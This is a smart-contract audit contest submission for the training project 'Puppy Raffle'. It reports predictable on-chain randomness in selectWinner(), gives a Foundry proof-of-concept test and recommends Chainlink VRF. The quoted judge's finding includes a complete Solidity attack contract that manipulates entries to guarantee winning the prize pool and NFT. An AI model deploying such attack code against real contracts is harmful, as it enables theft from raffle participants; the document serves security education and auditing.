Puppy Raffle

AI First Flight #1

Beginner FriendlyFoundrySolidityNFT

EXP

View results

Previous Next

Submission Details

Severity: high

Valid

Weak on-chain randomness in selectWinner() lets anyone predict and control the winner and the NFT rarity

bytethebuilder

Root + Impact

Description

selectWinner() derives both the winner and the NFT rarity from on-chain values that are fully known/controllable at call time:

uint256 winnerIndex =

@> uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty))) % players.length;

...

uint256 rarity = uint256(keccak256(abi.encodePacked(msg.sender, block.difficulty))) % 100;

msg.sender, block.timestamp, and block.difficulty/prevrandao are all visible to the caller (and influenceable by a validator). Anyone can compute the resulting winnerIndex off-chain BEFORE sending the transaction and only call selectWinner() in a block where they (or a chosen address) win - or simply revert otherwise. The same applies to rarity, so the attacker can also guarantee a legendary puppy. The raffle is not random; it is fully gameable, letting an attacker win the prize pool every time.

Risk

Likelihood: High - the inputs are public; any caller can predict the outcome with a trivial off-chain hash and choose when to call.

Impact: High - the winner (and thus the prize pool) and the NFT rarity can be deterministically controlled by an attacker, defeating the core fairness guarantee of the raffle.

Proof of Concept

The winner computed off-chain with the same inputs exactly matches the on-chain result, proving full predictability. Runnable Foundry test (add to PuppyRaffleTest.t.sol):

function test_PoC_predictableWinner() public {

address[] memory players = new address[](4);

players[0] = playerOne; players[1] = playerTwo; players[2] = playerThree; players[3] = playerFour;

puppyRaffle.enterRaffle{value: entranceFee * 4}(players);

vm.warp(block.timestamp + duration + 1);

vm.roll(block.number + 1);

// attacker predicts the winner BEFORE calling, using the same public inputs

uint256 predictedIndex =

uint256(keccak256(abi.encodePacked(address(this), block.timestamp, block.difficulty))) % 4;

address predictedWinner = puppyRaffle.players(predictedIndex);

puppyRaffle.selectWinner();

assertEq(puppyRaffle.previousWinner(), predictedWinner); // prediction was exact

}

Run forge test --mt test_PoC_predictableWinner -vv; it passes - the predicted winner equals the actual winner.

Recommended Mitigation

Do not derive randomness from on-chain values. Use a verifiable, manipulation-resistant source such as Chainlink VRF:

- uint256 winnerIndex =

- uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty))) % players.length;

+ // request randomness from Chainlink VRF and select the winner in the fulfillment callback

+ uint256 winnerIndex = vrfRandomWord % players.length;

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 3 hours ago

Submission Judgement Published

Validated

Assigned finding tags:

[H-03] Randomness can be gamed

## Description The randomness to select a winner can be gamed and an attacker can be chosen as winner without random element. ## Vulnerability Details Because all the variables to get a random winner on the contract are blockchain variables and are known, a malicious actor can use a smart contract to game the system and receive all funds and the NFT. ## Impact Critical ## POC ``` // SPDX-License-Identifier: No-License pragma solidity 0.7.6; interface IPuppyRaffle { function enterRaffle(address[] memory newPlayers) external payable; function getPlayersLength() external view returns (uint256); function selectWinner() external; } contract Attack { IPuppyRaffle raffle; constructor(address puppy) { raffle = IPuppyRaffle(puppy); } function attackRandomness() public { uint256 playersLength = raffle.getPlayersLength(); uint256 winnerIndex; uint256 toAdd = playersLength; while (true) { winnerIndex = uint256( keccak256( abi.encodePacked( address(this), block.timestamp, block.difficulty ) ) ) % toAdd; if (winnerIndex == playersLength) break; ++toAdd; } uint256 toLoop = toAdd - playersLength; address[] memory playersToAdd = new address[](toLoop); playersToAdd[0] = address(this); for (uint256 i = 1; i < toLoop; ++i) { playersToAdd[i] = address(i + 100); } uint256 valueToSend = 1e18 * toLoop; raffle.enterRaffle{value: valueToSend}(playersToAdd); raffle.selectWinner(); } receive() external payable {} function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) public returns (bytes4) { return this.onERC721Received.selector; } } ``` ## Recommendations Use Chainlink's VRF to generate a random number to select the winner. Patrick will be proud.

Rewards breakdown

This contest has a flat reward structure with the following payouts:

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being reviewed by our AI judge. Results will be available in a few minutes.

View all submissions

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!